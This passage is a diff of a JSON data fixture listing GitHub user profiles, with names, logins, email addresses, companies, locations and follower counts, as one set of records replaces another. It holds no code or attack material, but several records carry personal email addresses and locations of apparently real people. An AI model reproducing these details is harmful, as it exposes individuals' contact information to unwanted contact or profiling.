"2024-09-12T00:30:22.301Z", - "nest_updated_at": "2024-09-12T00:30:22.301Z", - "name": "Himanshu Kumar", - "login": "himanshukumar4642", - "email": "himanshukumar4642@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/56557192?v=4", - "company": "NIT Kurukshetra", - "location": "jaipur,Rajasthan,India", + "nest_created_at": "2024-09-22T08:42:33.814Z", + "nest_updated_at": "2024-09-22T19:29:07.948Z", + "name": "Bharat Reddy", + "login": "reddyalready", + "email": "me@bharatreddy.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7541378?v=4", + "company": "", + "location": "London, United Kingdom", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 37, - "created_at": "2019-10-14T17:08:10Z", - "updated_at": "2023-10-25T06:16:57Z", - "node_id": "MDQ6VXNlcjU2NTU3MTky", + "following_count": 10, + "followers_count": 14, + "public_gists_count": 2, + "public_repositories_count": 14, + "created_at": "2014-05-10T09:48:31Z", + "updated_at": "2024-09-21T12:54:32Z", + "node_id": "MDQ6VXNlcjc1NDEzNzg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408103,74 +666252,74 @@ }, { "model": "github.user", - "pk": 1915, + "pk": 7214, "fields": { - "nest_created_at": "2024-09-12T00:30:23.605Z", - "nest_updated_at": "2024-09-12T00:30:23.605Z", - "name": "Jack Pickford", - "login": "pickfoj", + "nest_created_at": "2024-09-22T08:42:34.124Z", + "nest_updated_at": "2024-09-22T19:27:16.994Z", + "name": "Bernhard Schandl", + "login": "besbes", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/44842019?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/836975?v=4", "company": "", - "location": "London", + "location": "Vienna, Austria", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 5, + "followers_count": 13, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-11-07T14:50:31Z", - "updated_at": "2024-08-20T10:21:00Z", - "node_id": "MDQ6VXNlcjQ0ODQyMDE5", - "bio": "", + "public_repositories_count": 5, + "created_at": "2011-06-08T08:14:23Z", + "updated_at": "2024-09-18T18:16:41Z", + "node_id": "MDQ6VXNlcjgzNjk3NQ==", + "bio": "Technology, People, Health, Sustainability", "is_hireable": false, - "twitter_username": "" + "twitter_username": "besbes" } }, { "model": "github.user", - "pk": 1916, + "pk": 7215, "fields": { - "nest_created_at": "2024-09-12T00:30:24.819Z", - "nest_updated_at": "2024-09-12T00:30:24.819Z", - "name": "Joaquín Alvarez", - "login": "joaquinalvarezdev", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/40568359?v=4", - "company": "", - "location": "Argentina", + "nest_created_at": "2024-09-22T08:42:34.449Z", + "nest_updated_at": "2024-09-22T19:27:17.321Z", + "name": "Alex Nordlund", + "login": "deepy", + "email": "deep.alexander@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/905507?v=4", + "company": "@Gradle previously @Nasdaq ", + "location": "Sweden", "collaborators_count": 0, - "following_count": 3, - "followers_count": 2, + "following_count": 113, + "followers_count": 48, "public_gists_count": 1, - "public_repositories_count": 10, - "created_at": "2018-06-25T12:33:08Z", - "updated_at": "2024-08-15T19:46:17Z", - "node_id": "MDQ6VXNlcjQwNTY4MzU5", + "public_repositories_count": 86, + "created_at": "2011-07-10T02:30:39Z", + "updated_at": "2024-08-13T07:03:55Z", + "node_id": "MDQ6VXNlcjkwNTUwNw==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1917, + "pk": 7216, "fields": { - "nest_created_at": "2024-09-12T00:30:26.073Z", - "nest_updated_at": "2024-09-12T00:30:26.073Z", - "name": "", - "login": "zubata", + "nest_created_at": "2024-09-22T08:42:41.228Z", + "nest_updated_at": "2024-09-22T19:27:24.098Z", + "name": "Nick Harvey", + "login": "NickHarvey2", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/50323296?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/24573707?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 1, + "following_count": 6, + "followers_count": 6, + "public_gists_count": 0, "public_repositories_count": 8, - "created_at": "2019-05-06T10:36:13Z", - "updated_at": "2024-08-18T20:14:59Z", - "node_id": "MDQ6VXNlcjUwMzIzMjk2", + "created_at": "2016-12-14T18:57:05Z", + "updated_at": "2024-07-10T00:28:53Z", + "node_id": "MDQ6VXNlcjI0NTczNzA3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408178,49 +666327,49 @@ }, { "model": "github.user", - "pk": 1918, + "pk": 7217, "fields": { - "nest_created_at": "2024-09-12T00:30:27.652Z", - "nest_updated_at": "2024-09-12T00:30:45.572Z", - "name": "David Hoffer", - "login": "dhoffer", + "nest_created_at": "2024-09-22T08:42:41.539Z", + "nest_updated_at": "2024-09-22T19:27:24.407Z", + "name": "James Pether Sörling", + "login": "pethers", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1568943?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1726836?v=4", "company": "", - "location": "Colorado Springs, CO", + "location": "Gothenburg, Sweden", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2012-03-23T17:36:49Z", - "updated_at": "2024-08-18T16:13:35Z", - "node_id": "MDQ6VXNlcjE1Njg5NDM=", - "bio": "", + "following_count": 127, + "followers_count": 37, + "public_gists_count": 2, + "public_repositories_count": 41, + "created_at": "2012-05-10T14:30:11Z", + "updated_at": "2024-08-28T11:23:37Z", + "node_id": "MDQ6VXNlcjE3MjY4MzY=", + "bio": "Experienced technology professional with expertise in information security and delivery of secure cloud systems.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1919, + "pk": 7218, "fields": { - "nest_created_at": "2024-09-12T00:30:28.859Z", - "nest_updated_at": "2024-09-12T00:30:28.859Z", - "name": "", - "login": "GitMarco", + "nest_created_at": "2024-09-22T08:42:41.866Z", + "nest_updated_at": "2024-09-22T19:27:24.752Z", + "name": "Nigel Chadwick", + "login": "NIGCH", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/340814?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/58299831?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2010-07-22T13:06:00Z", - "updated_at": "2024-09-10T14:05:09Z", - "node_id": "MDQ6VXNlcjM0MDgxNA==", + "public_repositories_count": 1, + "created_at": "2019-11-28T13:43:32Z", + "updated_at": "2024-07-10T13:05:29Z", + "node_id": "MDQ6VXNlcjU4Mjk5ODMx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408228,24 +666377,24 @@ }, { "model": "github.user", - "pk": 1920, + "pk": 7219, "fields": { - "nest_created_at": "2024-09-12T00:30:31.425Z", - "nest_updated_at": "2024-09-12T00:30:31.425Z", - "name": "Leander", - "login": "Leander250", + "nest_created_at": "2024-09-22T08:42:42.553Z", + "nest_updated_at": "2024-09-22T19:27:25.444Z", + "name": "", + "login": "fr33ky", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/19950310?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/38321094?v=4", "company": "", - "location": "", + "location": "Paris, France", "collaborators_count": 0, - "following_count": 3, - "followers_count": 2, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2016-06-15T10:46:39Z", - "updated_at": "2024-08-11T22:40:49Z", - "node_id": "MDQ6VXNlcjE5OTUwMzEw", + "public_repositories_count": 11, + "created_at": "2018-04-12T12:54:04Z", + "updated_at": "2024-07-31T17:11:48Z", + "node_id": "MDQ6VXNlcjM4MzIxMDk0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408253,24 +666402,24 @@ }, { "model": "github.user", - "pk": 1921, + "pk": 7220, "fields": { - "nest_created_at": "2024-09-12T00:30:32.630Z", - "nest_updated_at": "2024-09-12T00:30:32.630Z", - "name": "Henry", - "login": "profhenry", - "email": "github@profhenry.de", - "avatar_url": "https://avatars.githubusercontent.com/u/4500024?v=4", - "company": "@GEBIT", - "location": "Düsseldorf, Germany", + "nest_created_at": "2024-09-22T08:42:43.860Z", + "nest_updated_at": "2024-09-22T19:27:26.809Z", + "name": "Daniel Kopp", + "login": "devtribe", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1044246?v=4", + "company": "AOE GmbH", + "location": "Germany", "collaborators_count": 0, - "following_count": 10, - "followers_count": 2, + "following_count": 1, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2013-05-22T13:56:04Z", - "updated_at": "2024-08-04T10:15:04Z", - "node_id": "MDQ6VXNlcjQ1MDAwMjQ=", + "public_repositories_count": 16, + "created_at": "2011-09-12T12:15:56Z", + "updated_at": "2024-09-05T11:25:29Z", + "node_id": "MDQ6VXNlcjEwNDQyNDY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408278,24 +666427,24 @@ }, { "model": "github.user", - "pk": 1922, + "pk": 7221, "fields": { - "nest_created_at": "2024-09-12T00:30:33.802Z", - "nest_updated_at": "2024-09-12T00:30:33.802Z", - "name": "Alexandr", - "login": "myzonjkee", + "nest_created_at": "2024-09-22T08:42:44.175Z", + "nest_updated_at": "2024-09-22T19:27:27.121Z", + "name": "Jamie Cavanaugh", + "login": "jimmycav", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/18481498?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5732711?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2016-04-15T09:55:44Z", - "updated_at": "2024-08-07T08:05:45Z", - "node_id": "MDQ6VXNlcjE4NDgxNDk4", + "public_repositories_count": 0, + "created_at": "2013-10-20T21:27:41Z", + "updated_at": "2024-09-16T23:58:25Z", + "node_id": "MDQ6VXNlcjU3MzI3MTE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408303,74 +666452,74 @@ }, { "model": "github.user", - "pk": 1923, + "pk": 7222, "fields": { - "nest_created_at": "2024-09-12T00:30:36.259Z", - "nest_updated_at": "2024-09-12T00:30:36.259Z", - "name": "", - "login": "jsc57x", + "nest_created_at": "2024-09-22T08:42:44.500Z", + "nest_updated_at": "2024-09-22T19:27:27.437Z", + "name": "Hubert", + "login": "LesnyRumcajs", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11822263?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9642092?v=4", + "company": "ChainSafe", + "location": "Poznań, Poland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2015-04-06T18:12:04Z", - "updated_at": "2024-08-07T13:43:44Z", - "node_id": "MDQ6VXNlcjExODIyMjYz", - "bio": "", - "is_hireable": false, + "following_count": 11, + "followers_count": 94, + "public_gists_count": 4, + "public_repositories_count": 70, + "created_at": "2014-11-09T17:49:22Z", + "updated_at": "2024-09-03T21:13:13Z", + "node_id": "MDQ6VXNlcjk2NDIwOTI=", + "bio": "Software Engineer at @ChainSafe", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1924, + "pk": 7223, "fields": { - "nest_created_at": "2024-09-12T00:30:39.995Z", - "nest_updated_at": "2024-09-12T00:30:39.995Z", - "name": "Junglist", - "login": "BaronSam3di", + "nest_created_at": "2024-09-22T08:42:44.813Z", + "nest_updated_at": "2024-09-22T19:27:27.761Z", + "name": "Martin Sadowski", + "login": "ttsiebzehntt", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/21068499?v=4", - "company": "MegaCorp", - "location": "Afghanistan of course!", + "avatar_url": "https://avatars.githubusercontent.com/u/3662956?v=4", + "company": "", + "location": "Hamburg, Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 12, + "followers_count": 9, "public_gists_count": 0, - "public_repositories_count": 35, - "created_at": "2016-08-16T21:32:40Z", - "updated_at": "2024-09-11T10:01:37Z", - "node_id": "MDQ6VXNlcjIxMDY4NDk5", - "bio": "Security Tester at a MEGACORP with and Msc Data Science", - "is_hireable": true, + "public_repositories_count": 1, + "created_at": "2013-02-21T20:00:26Z", + "updated_at": "2024-07-22T09:15:47Z", + "node_id": "MDQ6VXNlcjM2NjI5NTY=", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1925, + "pk": 7224, "fields": { - "nest_created_at": "2024-09-12T00:30:41.643Z", - "nest_updated_at": "2024-09-12T00:30:41.643Z", - "name": "Travis Truttschel", - "login": "Flash619", - "email": "travis@truttschel.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1608113?v=4", - "company": "", - "location": "WI, USA", + "nest_created_at": "2024-09-22T08:42:45.127Z", + "nest_updated_at": "2024-09-22T19:27:28.073Z", + "name": "Matthias Hanisch", + "login": "reallyinsane", + "email": "matthias@mathan.io", + "avatar_url": "https://avatars.githubusercontent.com/u/8941555?v=4", + "company": "ISB AG", + "location": "Karlsruhe, Germany", "collaborators_count": 0, - "following_count": 1, - "followers_count": 6, + "following_count": 7, + "followers_count": 10, "public_gists_count": 0, - "public_repositories_count": 18, - "created_at": "2012-04-03T12:40:50Z", - "updated_at": "2024-08-21T14:20:42Z", - "node_id": "MDQ6VXNlcjE2MDgxMTM=", + "public_repositories_count": 24, + "created_at": "2014-09-27T19:48:01Z", + "updated_at": "2024-07-12T17:42:04Z", + "node_id": "MDQ6VXNlcjg5NDE1NTU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408378,24 +666527,24 @@ }, { "model": "github.user", - "pk": 1926, + "pk": 7225, "fields": { - "nest_created_at": "2024-09-12T00:30:43.081Z", - "nest_updated_at": "2024-09-12T00:30:43.081Z", - "name": "Jens Lidestrom", - "login": "jensli", - "email": "jens@lidestrom.se", - "avatar_url": "https://avatars.githubusercontent.com/u/123957?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:42:45.497Z", + "nest_updated_at": "2024-09-22T19:27:28.386Z", + "name": "Michael Fraefel", + "login": "frami", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5086744?v=4", + "company": "IMS AG", + "location": "Ittigen, Schweiz", "collaborators_count": 0, - "following_count": 0, + "following_count": 3, "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2009-09-06T23:04:12Z", - "updated_at": "2024-07-11T15:02:23Z", - "node_id": "MDQ6VXNlcjEyMzk1Nw==", + "public_repositories_count": 5, + "created_at": "2013-07-25T05:42:06Z", + "updated_at": "2024-04-15T08:59:24Z", + "node_id": "MDQ6VXNlcjUwODY3NDQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408403,14 +666552,14 @@ }, { "model": "github.user", - "pk": 1927, + "pk": 7226, "fields": { - "nest_created_at": "2024-09-12T00:30:44.326Z", - "nest_updated_at": "2024-09-12T00:30:44.326Z", + "nest_created_at": "2024-09-22T08:42:45.816Z", + "nest_updated_at": "2024-09-22T19:27:28.699Z", "name": "", - "login": "Yozhika", + "login": "Mobrockers", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/88938895?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/81913455?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -408418,9 +666567,34 @@ "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2021-08-14T15:17:42Z", - "updated_at": "2023-10-01T21:05:39Z", - "node_id": "MDQ6VXNlcjg4OTM4ODk1", + "created_at": "2021-04-04T13:31:16Z", + "updated_at": "2021-04-04T13:32:14Z", + "node_id": "MDQ6VXNlcjgxOTEzNDU1", + "bio": "@rouke-broersma", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7227, + "fields": { + "nest_created_at": "2024-09-22T08:42:46.129Z", + "nest_updated_at": "2024-09-22T19:27:29.028Z", + "name": "Sven Schober", + "login": "sschober", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/100225?v=4", + "company": "Siemens Logistics GmbH", + "location": "Nuremberg", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 18, + "public_gists_count": 18, + "public_repositories_count": 62, + "created_at": "2009-06-30T06:39:03Z", + "updated_at": "2024-09-06T18:44:16Z", + "node_id": "MDQ6VXNlcjEwMDIyNQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408428,24 +666602,24 @@ }, { "model": "github.user", - "pk": 1928, + "pk": 7228, "fields": { - "nest_created_at": "2024-09-12T00:30:46.771Z", - "nest_updated_at": "2024-09-12T00:33:04.605Z", + "nest_created_at": "2024-09-22T08:42:51.126Z", + "nest_updated_at": "2024-09-22T19:27:34.016Z", "name": "", - "login": "RobSHK", + "login": "Pavloro", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/83770776?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/51367990?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 5, + "followers_count": 1, "public_gists_count": 1, - "public_repositories_count": 0, - "created_at": "2021-05-06T13:52:56Z", - "updated_at": "2024-07-02T13:29:26Z", - "node_id": "MDQ6VXNlcjgzNzcwNzc2", + "public_repositories_count": 2, + "created_at": "2019-06-04T11:47:08Z", + "updated_at": "2024-07-19T14:38:01Z", + "node_id": "MDQ6VXNlcjUxMzY3OTkw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408453,74 +666627,74 @@ }, { "model": "github.user", - "pk": 1929, + "pk": 7229, "fields": { - "nest_created_at": "2024-09-12T00:30:47.580Z", - "nest_updated_at": "2024-09-12T00:30:47.580Z", - "name": "Anton Khruschceff", - "login": "ISINSHINO", + "nest_created_at": "2024-09-22T08:42:51.452Z", + "nest_updated_at": "2024-09-22T19:27:34.329Z", + "name": "", + "login": "tommybo-entur", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/18241825?v=4", - "company": "", - "location": "Taganrog, Russia", + "avatar_url": "https://avatars.githubusercontent.com/u/45754377?v=4", + "company": "Entur", + "location": "", "collaborators_count": 0, "following_count": 1, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2016-04-03T08:16:25Z", - "updated_at": "2024-06-17T14:04:57Z", - "node_id": "MDQ6VXNlcjE4MjQxODI1", - "bio": "software engineering", + "public_repositories_count": 6, + "created_at": "2018-12-10T08:57:10Z", + "updated_at": "2024-09-11T08:21:09Z", + "node_id": "MDQ6VXNlcjQ1NzU0Mzc3", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1930, + "pk": 7230, "fields": { - "nest_created_at": "2024-09-12T00:30:48.768Z", - "nest_updated_at": "2024-09-12T00:30:48.768Z", - "name": "Manikanda prabu", - "login": "maniprabu101993", + "nest_created_at": "2024-09-22T08:42:51.769Z", + "nest_updated_at": "2024-09-22T19:27:34.677Z", + "name": "Paul Ross", + "login": "paul-r0ss", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23401764?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8565783?v=4", "company": "", - "location": "Chennai", + "location": "", "collaborators_count": 0, - "following_count": 10, + "following_count": 1, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2016-11-11T13:29:54Z", - "updated_at": "2023-09-18T03:54:31Z", - "node_id": "MDQ6VXNlcjIzNDAxNzY0", - "bio": "Software Engineer", + "public_repositories_count": 0, + "created_at": "2014-08-27T07:22:24Z", + "updated_at": "2024-01-17T09:05:10Z", + "node_id": "MDQ6VXNlcjg1NjU3ODM=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1931, + "pk": 7231, "fields": { - "nest_created_at": "2024-09-12T00:30:50.787Z", - "nest_updated_at": "2024-09-12T00:30:50.787Z", - "name": "Ralph Wright", - "login": "ralph-wright", + "nest_created_at": "2024-09-22T08:42:56.746Z", + "nest_updated_at": "2024-09-22T19:28:14.728Z", + "name": "Thomas de Grenier de Latour", + "login": "thomasgl-orange", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12157437?v=4", - "company": "Onyx Point", + "avatar_url": "https://avatars.githubusercontent.com/u/6212720?v=4", + "company": "Orange", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 5, + "following_count": 2, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 42, - "created_at": "2015-04-28T17:25:39Z", - "updated_at": "2021-10-14T02:21:19Z", - "node_id": "MDQ6VXNlcjEyMTU3NDM3", + "public_repositories_count": 61, + "created_at": "2013-12-18T08:18:08Z", + "updated_at": "2024-08-29T07:59:03Z", + "node_id": "MDQ6VXNlcjYyMTI3MjA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408528,49 +666702,49 @@ }, { "model": "github.user", - "pk": 1932, + "pk": 7232, "fields": { - "nest_created_at": "2024-09-12T00:30:52.055Z", - "nest_updated_at": "2024-09-12T00:30:52.055Z", - "name": "Roman Wolf", - "login": "r4fterman", - "email": "r4fterman@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/3824734?v=4", - "company": "Virtimo", - "location": "Berlin", + "nest_created_at": "2024-09-22T08:42:57.378Z", + "nest_updated_at": "2024-09-22T19:27:40.389Z", + "name": "William Whittle", + "login": "whittlec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/879221?v=4", + "company": "", + "location": "UK", "collaborators_count": 0, - "following_count": 4, - "followers_count": 4, - "public_gists_count": 1, - "public_repositories_count": 8, - "created_at": "2013-03-10T16:29:24Z", - "updated_at": "2024-07-13T17:49:30Z", - "node_id": "MDQ6VXNlcjM4MjQ3MzQ=", - "bio": "Software Developer", + "following_count": 6, + "followers_count": 2, + "public_gists_count": 3, + "public_repositories_count": 6, + "created_at": "2011-06-27T16:29:45Z", + "updated_at": "2024-06-18T10:17:08Z", + "node_id": "MDQ6VXNlcjg3OTIyMQ==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1933, + "pk": 7233, "fields": { - "nest_created_at": "2024-09-12T00:30:53.259Z", - "nest_updated_at": "2024-09-12T00:31:58.285Z", - "name": "rochish", - "login": "rochish-suresh", + "nest_created_at": "2024-09-22T08:42:57.689Z", + "nest_updated_at": "2024-09-22T19:28:05.797Z", + "name": "Seth Jackson", + "login": "sethjackson", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/127931023?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6191831?v=4", + "company": "PNC", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2023-03-15T07:36:30Z", - "updated_at": "2024-04-26T08:09:35Z", - "node_id": "U_kgDOB6ASjw", + "following_count": 12, + "followers_count": 17, + "public_gists_count": 2, + "public_repositories_count": 2, + "created_at": "2013-12-15T19:03:44Z", + "updated_at": "2024-03-01T06:06:03Z", + "node_id": "MDQ6VXNlcjYxOTE4MzE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408578,24 +666752,24 @@ }, { "model": "github.user", - "pk": 1934, + "pk": 7234, "fields": { - "nest_created_at": "2024-09-12T00:30:54.903Z", - "nest_updated_at": "2024-09-12T00:30:54.903Z", - "name": "Michal Szelag", - "login": "michalszelagsonos", + "nest_created_at": "2024-09-22T08:42:58.640Z", + "nest_updated_at": "2024-09-22T19:27:41.635Z", + "name": "Daniel Warmuth", + "login": "danile42", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/52934505?v=4", - "company": "Sonos", - "location": "Boston", + "avatar_url": "https://avatars.githubusercontent.com/u/6450433?v=4", + "company": "Beta Systems Software AG", + "location": "Berlin", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-07-15T19:23:36Z", - "updated_at": "2024-09-03T19:15:35Z", - "node_id": "MDQ6VXNlcjUyOTM0NTA1", + "following_count": 4, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": "2014-01-20T12:35:40Z", + "updated_at": "2024-08-29T09:23:53Z", + "node_id": "MDQ6VXNlcjY0NTA0MzM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408603,49 +666777,49 @@ }, { "model": "github.user", - "pk": 1935, + "pk": 7235, "fields": { - "nest_created_at": "2024-09-12T00:30:56.119Z", - "nest_updated_at": "2024-09-12T00:31:59.510Z", - "name": "Peter Teichner", - "login": "ptecihner", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/92022180?v=4", + "nest_created_at": "2024-09-22T08:42:58.954Z", + "nest_updated_at": "2024-09-22T19:27:59.670Z", + "name": "Henri Gomez", + "login": "hgomez", + "email": "hgomez@apache.org", + "avatar_url": "https://avatars.githubusercontent.com/u/274370?v=4", "company": "", - "location": "", + "location": "Chambéry, France", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-10-06T09:16:41Z", - "updated_at": "2024-09-06T21:23:27Z", - "node_id": "U_kgDOBXwlpA", - "bio": "", + "following_count": 8, + "followers_count": 84, + "public_gists_count": 86, + "public_repositories_count": 81, + "created_at": "2010-05-12T11:30:49Z", + "updated_at": "2024-08-25T07:06:55Z", + "node_id": "MDQ6VXNlcjI3NDM3MA==", + "bio": "OSS activist, ASF Member, former Tomcat contributor, founder of JPackage, DevOps Incubator and OBuildFactory projects. Dev, QA and Ops", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1936, + "pk": 7236, "fields": { - "nest_created_at": "2024-09-12T00:30:58.693Z", - "nest_updated_at": "2024-09-12T00:30:58.693Z", - "name": "Jan Meiswinkel", - "login": "meiswjn", + "nest_created_at": "2024-09-22T08:42:59.600Z", + "nest_updated_at": "2024-09-22T19:27:42.578Z", + "name": "", + "login": "wschiang", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/41284403?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8932565?v=4", "company": "", - "location": "Germany", + "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 3, - "public_gists_count": 2, - "public_repositories_count": 28, - "created_at": "2018-07-16T07:58:57Z", - "updated_at": "2024-08-20T08:57:15Z", - "node_id": "MDQ6VXNlcjQxMjg0NDAz", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2014-09-26T19:39:57Z", + "updated_at": "2024-07-08T13:48:27Z", + "node_id": "MDQ6VXNlcjg5MzI1NjU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408653,49 +666827,49 @@ }, { "model": "github.user", - "pk": 1937, + "pk": 7237, "fields": { - "nest_created_at": "2024-09-12T00:30:59.941Z", - "nest_updated_at": "2024-09-12T00:30:59.941Z", - "name": "Matheos Mattsson", - "login": "Matheos96", + "nest_created_at": "2024-09-22T08:42:59.915Z", + "nest_updated_at": "2024-09-22T19:27:42.892Z", + "name": "Nolonger Adeveloper", + "login": "kudos-dude", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32064310?v=4", - "company": "@Siemens", - "location": "Finland", + "avatar_url": "https://avatars.githubusercontent.com/u/3792426?v=4", + "company": "", + "location": "United States", "collaborators_count": 0, - "following_count": 8, - "followers_count": 7, - "public_gists_count": 1, - "public_repositories_count": 19, - "created_at": "2017-09-18T12:16:24Z", - "updated_at": "2024-09-11T18:56:41Z", - "node_id": "MDQ6VXNlcjMyMDY0MzEw", - "bio": "Software Developer at Siemens Digital Industries Software", - "is_hireable": true, + "following_count": 1, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2013-03-06T23:04:57Z", + "updated_at": "2024-09-17T13:29:06Z", + "node_id": "MDQ6VXNlcjM3OTI0MjY=", + "bio": "It's never too late to learn.", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1938, + "pk": 7238, "fields": { - "nest_created_at": "2024-09-12T00:31:01.166Z", - "nest_updated_at": "2024-09-12T00:31:01.166Z", + "nest_created_at": "2024-09-22T08:43:00.234Z", + "nest_updated_at": "2024-09-22T19:42:07.102Z", "name": "", - "login": "agrawalsmart7", + "login": "m1a0yu3", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/39085884?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7245958?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 31, - "public_gists_count": 2, - "public_repositories_count": 30, - "created_at": "2018-05-08T10:16:33Z", - "updated_at": "2024-08-11T17:21:49Z", - "node_id": "MDQ6VXNlcjM5MDg1ODg0", + "following_count": 225, + "followers_count": 45, + "public_gists_count": 14, + "public_repositories_count": 128, + "created_at": "2014-04-10T02:36:33Z", + "updated_at": "2024-09-15T11:26:57Z", + "node_id": "MDQ6VXNlcjcyNDU5NTg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408703,24 +666877,24 @@ }, { "model": "github.user", - "pk": 1939, + "pk": 7239, "fields": { - "nest_created_at": "2024-09-12T00:31:02.629Z", - "nest_updated_at": "2024-09-12T00:31:02.629Z", - "name": "Kai Helbig", - "login": "ostrya", + "nest_created_at": "2024-09-22T08:43:00.670Z", + "nest_updated_at": "2024-09-22T19:28:18.838Z", + "name": "", + "login": "strangelookingnerd", "email": "", - "avatar_url": 